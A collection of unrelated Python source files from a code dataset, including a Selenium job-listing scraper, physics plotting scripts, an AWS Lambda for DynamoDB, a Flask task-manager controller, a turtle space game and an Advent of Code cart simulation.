filters\n \"\"\"\n logger.info(\"fill filters\")\n\n form_id = 'new_form_main_search'\n logger.info(\"try to get form with filters\")\n self.filter_form = WebDriverWait(self.browser, 5).until(\n EC.presence_of_element_located((By.ID, form_id)))\n\n self._fill_query()\n self._fill_filters()\n self._submit_filters()\n\n def _fill_query(self):\n \"\"\"\n Paste query word into field\n \"\"\"\n logger.info(\"fill query\")\n search_input_id = 'main-search-what'\n query = 'nordsee'\n # fill search query\n self.filter_form.find_element_by_id(search_input_id).send_keys(query)\n\n def _fill_filters(self):\n \"\"\"\n Fill filters inputs\n \"\"\"\n logger.info(\"fill filters inputs\")\n\n searched_industry = 'Gastronomie / Tourismus'\n filter_box_class = 'filter-box'\n range_id = 'form_main_search_radius'\n industry_select_id = 'form_main_search_industry_public_id'\n\n logger.info(\"try to open block with filters\")\n # click to open filters\n filter_box = self.filter_form.find_element_by_class_name(\n filter_box_class)\n filter_box.click()\n\n logger.info(\"try to set range\")\n # set range to 100 km\n range_filter = filter_box.find_element_by_id(range_id)\n self.browser.execute_script(\n \"arguments[0].setAttribute('value', 100)\", range_filter)\n\n logger.info(\"try to select searched industry\")\n # industry select\n industry_select = filter_box.find_element_by_id(industry_select_id)\n subelement_class = 'selectize-control'\n parent = industry_select.find_element_by_xpath('..')\n subelement = parent.find_element_by_class_name(subelement_class)\n subelement.click()\n\n option = subelement.find_element_by_xpath(\n \"//div[@class='option'][contains(text(), '{}')]\".format(\n searched_industry))\n option.click()\n\n def _submit_filters(self):\n \"\"\"\n Submit filters form\n \"\"\"\n logger.info(\"submit form with filters\")\n self.filter_form.submit()\n\n def _handle_results(self):\n \"\"\"\n Parse filtered results\n \"\"\"\n logger.info(\"handle results\")\n results_wrapper_class = 'search-result__wrapper'\n card_class = 'simple-card'\n\n WebDriverWait(self.browser, 5).until(\n EC.presence_of_element_located((By.CLASS_NAME, card_class)))\n\n results_count = self._get_results_count()\n current_count = len(\n self.browser.find_elements_by_class_name(card_class))\n\n logger.info(\"scroll to view all results\")\n while current_count < results_count:\n self._next_page()\n current_count = len(\n self.browser.find_elements_by_class_name(card_class))\n\n logger.info(\"get wrapper with results\")\n results = self.browser.find_element_by_class_name(\n results_wrapper_class)\n\n cards = results.find_elements_by_class_name(card_class)\n\n actual_vacancies_ids = []\n\n logger.info(\"handle cards\")\n for card in cards:\n actual_vacancies_ids.append(self._handle_card(card))\n\n logger.info(\"handling cards ends, set old vacancies inactive\")\n\n # set old vacancies inactive\n Vacancy.objects.exclude(id__in=actual_vacancies_ids).update(\n is_active=False)\n\n def _handle_card(self, card):\n \"\"\"\n Parse card info\n :param card: handling card\n :return:\n \"\"\"\n logger.info(\"handle card\")\n vacancy_title = card.find_element_by_tag_name(\"h3\").text\n company_name = card.find_element_by_tag_name(\n \"h4\").find_element_by_tag_name(\n \"strong\").text\n start_date_str = card.find_element_by_class_name(\n 'fact__content--calendar').find_element_by_class_name('value').text\n\n try:\n vacancy_start_date = datetime.strptime(start_date_str, '%d.%m.%Y')\n except:\n vacancy_start_date = None\n\n city_name = card.find_element_by_class_name(\n 'fact__content--location').find_element_by_class_name('value').text\n\n company_logo = card.find_element_by_class_name(\n 'simple-card__logo-overlay').get_attribute('src')\n\n vacancy_link = card.find_element_by_class_name(\n 'simple-card__link').get_attribute('href')\n self.vacancy_links.append(vacancy_link)\n vacancy_uuid = \\\n parse.parse_qs(parse.urlparse(vacancy_link).query)['vacancy'][0]\n\n logger.info(\n \"{} {} {} {}\".format(vacancy_title, company_name, start_date_str,\n city_name, company_logo))\n\n logger.info(\"save parsed data to database\")\n city, _ = City.objects.get_or_create(name=city_name)\n company, _ = Company.objects.update_or_create(name=company_name,\n defaults={\n 'logo': company_logo})\n # vacancy data to update\n vacancy_data = {\n 'title': vacancy_title,\n 'starts_at': vacancy_start_date,\n 'location': city,\n 'company': company,\n 'is_active': True\n }\n # update or create vacancies\n vacancy, _ = Vacancy.objects.update_or_create(uuid=vacancy_uuid,\n defaults=vacancy_data)\n logger.info(\"data saved successfully\")\n return vacancy.id\n\n def _get_results_count(self):\n \"\"\"\n Get results count\n \"\"\"\n return int(self.browser.find_element_by_class_name('blob').text)\n\n def _next_page(self):\n \"\"\"\n Scroll page to next one\n \"\"\"\n try:\n self.browser.find_element_by_class_name(\n 'js-load-more-button-here').click()\n except:\n self.browser.execute_script(\n 'window.scrollTo(0, document.body.scrollHeight);')\n time.sleep(2)\n\n def _parse_vacancy_page(self):\n logger.info(\"parse vacancy pages\")\n for link in self.vacancy_links:\n self.browser.get(link)\n\n # update description value of vacancy\n vacancy_uuid = \\\n parse.parse_qs(parse.urlparse(link).query)['vacancy'][0]\n vacancy_descr = self.browser.find_element_by_class_name(\n 'entity-description__description').text\n\n # update image list value of vacancy\n vacancy_images_block = self.browser.find_element_by_class_name(\n 'quadruple-media__media-list')\n vacancy_images_list = vacancy_images_block.find_elements_by_tag_name(\n 'img')\n image_list = []\n for image in vacancy_images_list:\n image_list.append(image.get_attribute('src'))\n\n Vacancy.objects.filter(uuid=vacancy_uuid).update(\n description=vacancy_descr, image_list=image_list)\n logger.info(\n \"successfully updated vacancy uuid-{}\".format(vacancy_uuid))\n","sub_path":"src/apps/site_parser/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"261533707","text":"#%matplotlib inline\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import ma\nfrom matplotlib import colors, ticker, cm\nfrom matplotlib.mlab import bivariate_normal\nfrom optparse import OptionParser\nimport os\nfrom mpl_toolkits.mplot3d import Axes3D\nimport random\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import rc\n#plt.rcParams['mathtext.fontset'] = 'dejavuserif'\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\n\n#rc('text', usetex=True) #open this for latex\n######## Constant defined here ########\npi = 3.1415926535897932384626\nq0 = 1.602176565e-19 # C\nm0 = 9.10938291e-31 # kg\nv0 = 2.99792458e8 # m/s^2\nkb = 1.3806488e-23 # J/K\nmu0 = 4.0e-7*pi # N/A^2\nepsilon0 = 8.8541878176203899e-12 # F/m\nh_planck = 6.62606957e-34 # J s\nwavelength= 1.0e-6\nfrequency = v0*2*pi/wavelength\n\nexunit = m0*v0*frequency/q0\nbxunit = m0*frequency/q0\ndenunit = frequency**2*epsilon0*m0/q0**2\nprint('electric field unit: '+str(exunit))\nprint('magnetic field unit: '+str(bxunit))\nprint('density unit nc: '+str(denunit))\nfont = {'family' : 'monospace',\n 'color' : 'black',\n 'weight' : 'normal',\n 'size' : 25,\n }\n\nfont2 = {'family' : 'monospace',\n 'color' : 'black',\n 'weight' : 'normal',\n 'size' : 20,\n }\n\nfont_size =25\nfont_size2=20\n\n\nfrom_path = './spin_a70_n15_n5_fine_2/'\nto_path = './spin_a70_n15_n5_fine_2_fig/'\npart_name = 'ion_s'\npart_mass = 1836\nion_px=np.loadtxt(from_path+part_name+'_px.txt')\nion_py=np.loadtxt(from_path+part_name+'_py.txt')\nion_pz=np.loadtxt(from_path+part_name+'_pz.txt')\nion_xx=np.loadtxt(from_path+part_name+'_xx.txt')\nion_yy=np.loadtxt(from_path+part_name+'_yy.txt')\nion_zz=np.loadtxt(from_path+part_name+'_zz.txt')\nion_sx=np.loadtxt(from_path+part_name+'_sx.txt')*(part_mass*m0*v0)\nion_sy=np.loadtxt(from_path+part_name+'_sy.txt')*(part_mass*m0*v0)\nion_sz=np.loadtxt(from_path+part_name+'_sz.txt')*(part_mass*m0*v0)\nion_ww=np.loadtxt(from_path+part_name+'_ww.txt')\nion_ex=np.loadtxt(from_path+part_name+'_ex.txt')\nion_ey=np.loadtxt(from_path+part_name+'_ey.txt')\nion_ez=np.loadtxt(from_path+part_name+'_ez.txt')\nion_bx=np.loadtxt(from_path+part_name+'_bx.txt')\nion_by=np.loadtxt(from_path+part_name+'_by.txt')\nion_bz=np.loadtxt(from_path+part_name+'_bz.txt')\n\nion_tt=np.linspace(0.333333,75,225) \nion_pp=(ion_px**2+ion_py**2+ion_pz**2)**0.5\nion_ek=((ion_px**2+ion_py**2+ion_pz**2+1)**0.5-1)*918.0\nion_ss=(ion_sx**2+ion_sy**2+ion_sz**2)**0.5\n\n\nlwdth = 2\n#plt.subplot(3,3,1)\n#for n in range(np.size(ion_ww[:,0])): \n# plt.plot(ion_tt, ion_ek[n,:], linestyle='-',color='red',linewidth=lwdth)\n##n=10\n##plt.scatter(ion_tt, ion_ek[n,:], c=ion_ek[n,:], norm=colors.Normalize(vmin=0,vmax=150), s=25, cmap='magma', edgecolors='None', alpha=1,zorder=3)\n##n=47\n##plt.scatter(ion_tt, ion_ek[n,:], c=ion_ek[n,:], norm=colors.Normalize(vmin=0,vmax=150), s=25, cmap='magma', edgecolors='None', alpha=1,zorder=3)\n#plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n#plt.ylabel(r'$\\varepsilon_i\\ [\\mathrm{MeV}]$',fontdict=font)\n#plt.xticks(fontsize=font_size); \n#plt.yticks(fontsize=font_size);\n#plt.xlim(20,70)\n#plt.ylim(-10,210)\n\nfor n in range(np.size(ion_ww[:,0])):\n plt.subplot(4,3,1)\n plt.plot(ion_tt, ion_sx[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel('$s_x$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,2)\n plt.plot(ion_tt, ion_sy[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel('$s_y$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,3)\n plt.plot(ion_tt, ion_sz[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel('$s_z$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,4)\n dsx_dt = ion_sy*ion_bz-ion_sz*ion_by\n plt.plot(ion_tt, dsx_dt[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel(r'$ds_x/dt\\approx s_yB_z-s_zBy$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,5)\n dsy_dt = ion_sz*ion_bx-ion_sx*ion_bz\n plt.plot(ion_tt, dsy_dt[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel(r'$ds_y/dt\\approx s_zB_x-s_xBz$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,6)\n dsz_dt = ion_sx*ion_by-ion_sy*ion_bx\n plt.plot(ion_tt, dsz_dt[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.ylabel(r'$ds_z/dt\\approx s_xB_y-s_yBx$',fontdict=font)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,7)\n plt.plot(ion_tt, ion_ex[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$E_x\\ [m_ec\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,8)\n plt.plot(ion_tt, ion_ey[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$E_y\\ [m_ec\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,9)\n plt.plot(ion_tt, ion_ez[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$E_z\\ [m_ec\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,10)\n plt.plot(ion_tt, ion_bx[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$B_x\\ [m_e\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,11)\n plt.plot(ion_tt, ion_by[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$B_y\\ [m_e\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n plt.subplot(4,3,12)\n plt.plot(ion_tt, ion_bz[n,:], linestyle='-',color='red',linewidth=lwdth)\n plt.xlabel('$t\\ [\\mathrm{fs}]$',fontdict=font)\n plt.ylabel('$B_z\\ [m_e\\omega_0/|e|]$',fontdict=font)\n plt.xticks(fontsize=font_size); \n plt.yticks(fontsize=font_size);\n #plt.xlim(20,70)\n \n \n plt.subplots_adjust(left=0.1, bottom=0.12, right=0.98, top=0.98, wspace=0.24, hspace=0.2)\n fig = plt.gcf()\n fig.set_size_inches(18, 18)\n #plt.show()\n fig.savefig(to_path+'plot_spin_'+str(n).zfill(4)+'.png',format='png',dpi=160, transparent=None)\n plt.close(\"all\")\n print(to_path+'plot_spin_'+str(n).zfill(4)+'.png')\n","sub_path":"plot_spin_for.py","file_name":"plot_spin_for.py","file_ext":"py","file_size_in_byte":7541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"163480072","text":"import json\nimport boto3\n\ndynamodb = boto3.resource('dynamodb', region_name='us-east-1')\ntable = dynamodb.Table('Users')\nclient = boto3.client('dynamodb')\n\ndef lambda_handler(event, context):\n uid = event[\"queryStringParameters\"][\"uid\"]\n drink = event[\"queryStringParameters\"][\"drink\"]\n fixedList = []\n position = -1\n \n #As it's not possible to use DELETE on a List in DynamoDB(yet), I need to\n #get every blacklisted drink of the specified user to get the drink's position\n userInfo = client.get_item(Key={'Uid': { \"S\": uid } }, AttributesToGet=[\"Blacklisted\"], TableName='Users')\n blackListDrinks = userInfo.get(\"Item\").get(\"Blacklisted\").get(\"L\")\n for x in blackListDrinks:\n fixedList.append(x['S'])\n print(fixedList)\n if drink in fixedList:\n position = fixedList.index(drink)\n \n #If the drink exists on the list, REMOVE it using it's position\n if position != -1:\n response = table.update_item(\n Key={'Uid': uid},\n UpdateExpression=\"REMOVE Blacklisted[\"+ str(position) +\"]\",\n )\n print(position)\n \n return {\n 'statusCode': 200,\n 'headers': {\n \"Access-Control-Allow-Origin\": \"*\"\n },\n 'body': json.dumps(response)\n }\n","sub_path":"Peticiones HTTP (AWS Lambda)/deleteBoozerDrinkFromBlacklist.py","file_name":"deleteBoozerDrinkFromBlacklist.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"489961697","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 17 12:35:00 2020\r\n\r\n@author: figonpiot\r\n\"\"\"\r\n\r\n# parametryzacja klasy figure\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfig = plt.figure(figsize=(5,5),facecolor=\"white\",edgecolor=\"blue\",linewidth=3)\r\nax = fig.add_axes([0,0,1,1])\r\nax.set_xscale(\"linear\")\r\nax.set_yscale('linear')\r\nax.set_adjustable(\"box\")\r\nax.set_alpha(\"none\")\r\nax.set_autoscale_on(True)\r\nax.set_snap(True)\r\nax.grid(True,color='y')\r\nax.set_xlabel('x',FontSize=12)\r\nax.set_ylabel('f(x)',FontSize=12)\r\nax.set_xlim([0,np.arange(0,100).max()])\r\nline1 = ax.plot(np.arange(0,100),np.sin(2*np.pi*1/50*np.arange(0,100))-\r\n 1/2*np.sin(2*np.pi*1/25.6*np.arange(0,100))+2,'*-r',scaley=True,scalex=True)\r\nline2 = ax.plot(np.arange(0,100),np.sin(2*np.pi*1/32.3*np.arange(0,100)-np.pi)-\r\n 0.1*np.sin(2*np.pi*1/10.1*np.arange(0,100))+2)\r\nax.legend(labels = ('plot1','plot2'))\r\nax.plot()\r\n\r\nfig1 = plt.figure","sub_path":"wykres_pltfigure_cechy.py","file_name":"wykres_pltfigure_cechy.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"2491299","text":"'''\n리스트 내포 기능을 이용해 [12, 24, 35, 70, 88, 120, 155]에서\n\n첫번째, 다섯번째, 여섯번째 항목을 제거한 후 리스트를 출력하는 프로그램을 작성하십시오.\n'''\n\nsample_list = [12, 24, 35, 70, 88, 120, 155]\nexcept_list = [num for idx,num in enumerate(sample_list) if idx != 0 if idx != 4 if idx != 5 ]\n\nprint(except_list)","sub_path":"PYTHON/파이썬_프로그래밍_기초_문제풀이/12/12-21.py","file_name":"12-21.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"397632899","text":"from .models import User, Task\nfrom flask import jsonify\nfrom datetime import datetime\nfrom hashlib import sha256\n\ndef format_t(time):\n if (time != None):\n return (time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n return (None)\n\ndef get_status(nb):\n status = \"not started\"\n if (nb == 1):\n status = \"in progress\"\n if (nb == 2):\n status = \"done\"\n return (status)\n\n\ndef register_user(session, request):\n try:\n user = User(request.form[\"username\"])\n if (\"ID\" in session):\n dest = {\"error\" : \"internal error\"}\n elif (user.add(request.form[\"password\"]) == False):\n dest = {\"error\" : \"account already exists\"}\n else:\n dest = {\"result\" : \"account created\"}\n except:\n dest = {\"error\" : \"internal error\"}\n return (dest)\n\ndef signin_user(session, request):\n try:\n user = User.get_by_name(request.form[\"username\"])\n if (\"ID\" in session):\n dest = {\"error\" : \"internal error\"}\n elif (user == None or\n str(sha256(str(request.form[\"password\"]).encode(\"utf-8\")).digest()) != user.password):\n dest = {\"error\" : \"login or password does not match\"}\n else:\n session[\"ID\"] = user.user_id\n dest = {\"result\" : \"signin successful\"}\n except:\n dest = {\"error\" : \"internal error\"}\n return (dest)\n\ndef signout_user(session):\n if (\"ID\" in session):\n session.pop(\"ID\", None)\n return ({\"result\" : \"signout successful\"})\n return (jsonify(None))\n\n\ndef get_user_infos(session):\n if (not \"ID\" in session):\n return ({\"error\" : \"you must be logged in\"})\n user = User.get_by_id(session[\"ID\"])\n if (user is None):\n return ({\"error\" : \"internal error\"})\n return ({\"result\" : {\"user_id\" : user.user_id, \"username\" : user.username}})\n\ndef get_user_task(session):\n if (not \"ID\" in session):\n return ({\"error\" : \"you must be logged in\"})\n dest = []\n for task in User.get_by_id(session[\"ID\"]).tasks:\n status = get_status(task.status)\n dest.append({task.task_id : {\"title\" : task.title, \"begin\" : format_t(task.begin), \"end\" : format_t(task.end), \"status\" : status}})\n return ({\"result\" : {\"tasks\" : dest}})\n\n\ndef modify_task(session, request, id):\n if (not \"ID\" in session):\n return ({\"error\" : \"you must be logged in\"})\n user = User.get_by_id(session[\"ID\"])\n task = Task.get_by_id(id)\n if (task == None):\n return ({\"error\" : \"task id does not exist\"})\n if (user.has_task(task.task_id) == False):\n return ({\"error\" : \"internal error\"})\n \n if (request.method == \"GET\"):\n return ({\"result\" : {\"title\" : task.title, \"begin\" : format_t(task.begin), \"end\" : format_t(task.end), \"status\" : get_status(task.status)}})\n try:\n task.update(request)\n dest = {\"result\" : \"update done\"}\n except:\n dest = {\"error\" : \"internal error\"}\n return (dest)\n\ndef new_task(session, request):\n try:\n if (not \"ID\" in session):\n dest = {\"error\" : \"you must be logged in\"}\n else:\n task = Task(request.form[\"title\"])\n task.add(session[\"ID\"], request)\n dest = {\"result\" : \"new task added\"}\n except:\n dest = {\"error\" : \"internal error\"}\n return (dest)\n\ndef rm_task(session, id):\n if (not \"ID\" in session):\n return ({\"error\" : \"you must be logged in\"})\n user = User.get_by_id(session[\"ID\"])\n task = Task.get_by_id(id)\n if (task == None):\n return ({\"error\" : \"task id does not exist\"})\n if (user.has_task(task.task_id) == False):\n return ({\"error\" : \"internal error\"})\n task.delete()\n return ({\"result\" : \"task deleted\"})","sub_path":"app/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535916445","text":"import turtle\nimport random\nimport time\nfrom random import randint\nfrom random import seed\n\nfor _ in range(1):\n value = randint(-300, 300)\n\n\ndef fel():\n ypozicio = urhajo.ycor()\n ypozicio += 20\n urhajo.sety(ypozicio)\n\n\ndef le():\n ypozicio = urhajo.ycor()\n ypozicio -= 20\n urhajo.sety(ypozicio)\n\n\ndef jobbra():\n xpozicio = urhajo.xcor()\n xpozicio += 20\n urhajo.setx(xpozicio)\n\n\ndef balra():\n xpozicio = urhajo.xcor()\n xpozicio -= 20\n urhajo.setx(xpozicio)\n\n\nkijelzo = turtle.Turtle()\nkijelzo.hideturtle()\n\nspace = turtle.Screen()\nspace.setup(width=800, height=600)\nspace.bgpic(\"hatter.png\")\nspace.addshape(\"sprite.gif\")\nspace.addshape(\"meteor2.gif\")\nspace.addshape(\"meteor1.gif\")\nspace.tracer(0)\nspace.listen()\nspace.onkeypress(fel, \"Up\")\nspace.onkeypress(le, \"Down\")\nspace.onkeypress(balra, \"Left\")\nspace.onkeypress(jobbra, \"Right\")\n\nurhajo = turtle.Turtle()\nurhajo.shape(\"sprite.gif\")\nurhajo.penup()\n\nmeteor = turtle.Turtle()\nmeteor.penup()\nshapes = [\"meteor2.gif\",\"meteor1.gif\"]\nmeteor.shape(random.choice(shapes))\nmeteor.setx(400)\nmeteor.sety(random.randint(-270,270))\n\n\npontok = 0\nelet = 0\npen=turtle.Turtle()\npen.hideturtle()\n\n\nwhile True:\n\n space.update()\n time.sleep(0.1)\n\n if urhajo.ycor() > 300:\n urhajo.sety(-300)\n if urhajo.ycor() < -300:\n urhajo.sety(300)\n if urhajo.xcor() > 400:\n urhajo.setx(-400)\n if urhajo.xcor() < -400:\n urhajo.setx(400)\n\n if meteor.xcor() < -400 or meteor.ycor() < -300 or meteor.ycor() > 300:\n meteor.shape(random.choice(shapes))\n meteor.setx(400)\n meteor.sety(random.randint(-270,270))\n\n pontok += 1\n pen.clear()\n pen.color(\"white\")\n pen.penup()\n pen.goto(-320,260) \n pen.write(f\"Pontjaid: {pontok}\", align=\"center\", font=(\"Arial\", 20, \"bold\"))\n\n\n if urhajo.distance(meteor.xcor(), meteor.ycor()) < 70:\n meteor.shape(random.choice(shapes))\n meteor.setx(400)\n meteor.sety(random.randint(-270,270))\n \n elet += 1 \n pen.clear()\n pen.color(\"red\")\n pen.penup()\n pen.goto(0,260) \n pen.write(f\"Találat: {elet}\", align=\"center\", font=(\"Arial\",20,\"bold\"))\n\n\n\n if meteor.shape() == \"meteor2.gif\":\n meteor.setx(meteor.xcor()-15)\n elif meteor.shape() == \"meteor1.gif\":\n meteor.setx(meteor.xcor()-15)\n else:\n meteor.setx(meteor.xcor()+15)\n \n if elet == 3:\n space.clear() \n kijelzo.write(\"MEGHALTÁL!\", align=\"center\", font=(\"Arial\", 30, \"bold\"))","sub_path":"StarWars.py","file_name":"StarWars.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"386687719","text":"from __future__ import unicode_literals\nfrom django.db import models\n\nfrom .especialidad import Especialidad\n\n\nclass Materia(models.Model):\n id_materia = models.AutoField(primary_key=True)\n # id_reticula se removio\n clave = models.CharField(max_length=128)\n semestre = models.IntegerField(default=0)\n nombre = models.CharField(max_length=128)\n creditos = models.IntegerField()\n horas_teoricas = models.IntegerField()\n horas_practicas = models.IntegerField()\n especialidad = models.ForeignKey(Especialidad, on_delete=models.CASCADE, default=0)\n previous = models.IntegerField(default=0) # guarda el id de la materia previa a esta\n next = models.IntegerField(default=0)\n\n def __str__(self):\n return '%s - %s' % (self.clave, self.nombre)\n","sub_path":"preinscripcion/home/models/materia.py","file_name":"materia.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"638100381","text":"class Cart:\n def __init__(self, x, y, direction):\n self.x = x\n self.y = y\n self.direction = direction\n self.next_intersection = 'L'\n self.active = True\n\n def update_next_intersection(self):\n if self.next_intersection == 'L':\n self.next_intersection = 'S'\n elif self.next_intersection == 'R':\n self.next_intersection = 'L'\n elif self.next_intersection == 'S':\n self.next_intersection = 'R'\n\ndef read_input():\n with open('../input/day13.txt') as f:\n lines = f.readlines()\n m = []\n carts = []\n j = 0\n path_segments = {'v': '|', '^': '|', '<': '-', '>': '-'}\n for line in lines:\n i = 0\n r = list(line.strip('\\n'))\n for k in range(len(r)):\n if r[k] in ['v', '^', '<', '>']:\n carts.append(Cart(i, j, r[k]))\n r[k] = path_segments[r[k]]\n i += 1\n m.append(r)\n j += 1\n return carts, m\n\ndef move_down(cart, next_loc):\n cart.y = cart.y+1\n if next_loc == '\\\\':\n cart.direction = '>'\n elif next_loc == '/':\n cart.direction = '<'\n elif next_loc == '+':\n if cart.next_intersection == 'L':\n cart.direction = '>'\n elif cart.next_intersection == 'R':\n cart.direction = '<'\n\ndef move_up(cart, next_loc):\n cart.y = cart.y-1\n if next_loc == '\\\\':\n cart.direction = '<'\n elif next_loc == '/':\n cart.direction = '>'\n elif next_loc == '+':\n if cart.next_intersection == 'L':\n cart.direction = '<'\n elif cart.next_intersection == 'R':\n cart.direction = '>'\n\ndef move_left(cart, next_loc):\n cart.x = cart.x-1\n if next_loc == '\\\\':\n cart.direction = '^'\n elif next_loc == '/':\n cart.direction = 'v'\n elif next_loc == '+':\n if cart.next_intersection == 'L':\n cart.direction = 'v'\n elif cart.next_intersection == 'R':\n cart.direction = '^'\n\ndef move_right(cart, next_loc):\n cart.x = cart.x+1\n if next_loc == '\\\\':\n cart.direction = 'v'\n elif next_loc == '/':\n cart.direction = '^'\n elif next_loc == '+':\n if cart.next_intersection == 'L':\n cart.direction = '^'\n elif cart.next_intersection == 'R':\n cart.direction = 'v'\n\ndef move(cart, m):\n if cart.direction == 'v':\n move_down(cart, m[cart.y+1][cart.x])\n elif cart.direction == '^':\n move_up(cart, m[cart.y-1][cart.x])\n elif cart.direction == '<':\n move_left(cart, m[cart.y][cart.x-1])\n elif cart.direction == '>':\n move_right(cart, m[cart.y][cart.x+1])\n if m[cart.y][cart.x] == '+':\n cart.update_next_intersection()\n\ndef count_active(carts):\n count = 0\n for c in carts:\n if c.active:\n count += 1\n return count\n\ncarts, m = read_input()\nactive_count = count_active(carts)\nwhile active_count > 1:\n for c in carts:\n if c.active:\n move(c, m)\n for c2 in carts:\n if c2.active and c2 != c and c2.x == c.x and c2.y == c.y:\n print('Crash in:',(c.x,c.y))\n c.active = False\n c2.active = False\n active_count = count_active(carts)\nfor c in carts:\n if c.active:\n print(c.x,',',c.y)","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"78296893","text":"#coding=utf-8\n\nimport sys\nimport datetime\n\nfrom resource import Configuration\nfrom resource import Constant\nfrom resource import ExceptDeal\nfrom scrape.DataScrape import *\n\nfrom quotation.QuotationDB import *\nfrom quotation.QuotationRecord import *\n\nclass CoordinateDS2QDB():\n def __init__(self):\n self.week = (datetime.datetime.now()).strftime('%U')# 本周周数记录\n\n self.dtScrp = DataScrape() # 初始化数据抓取模块\n # Quotation record Handle\n self.recordHdl = QuotationRecord(Configuration.UPDATE_PERIOD_FLAG,\\\n Configuration.UPDATE_LOCK)\n # Quotation DB Handle\n self.dbQuotationHdl = QuotationDB(Configuration.UPDATE_PERIOD_FLAG,\\\n Configuration.UPDATE_LOCK,\\\n self.recordHdl.get_record_dict())\n\n def init_quotation(self):\n \"\"\" 外部接口API:行情数据库线程准备 \"\"\"\n # 创建记录字典\n self.recordHdl.create_record_dict()\n # 创建行情数据库文件\n self.dbQuotationHdl.create_period_db(Configuration.get_working_directory())\n\n # 以下是定时器回调函数:\n def work_DS2QDB_heartbeat(self):\n \"\"\" 快速定时器(心跳定时器)回调函数 : 数据抓取模块和行情数据库线程(缓冲字典)之间协同工作函数 \"\"\"\n # 全球市场结算期间不更新缓冲记录\n if Constant.is_closing_market():\n return\n if Constant.exit_on_weekend(self.week):\n sys.exit()\n\n # 数据抓取并筛选\n infoList = self.dtScrp.query_info()\n if len(infoList) != 0:\n self.recordHdl.update_dict_record(infoList)\n\n 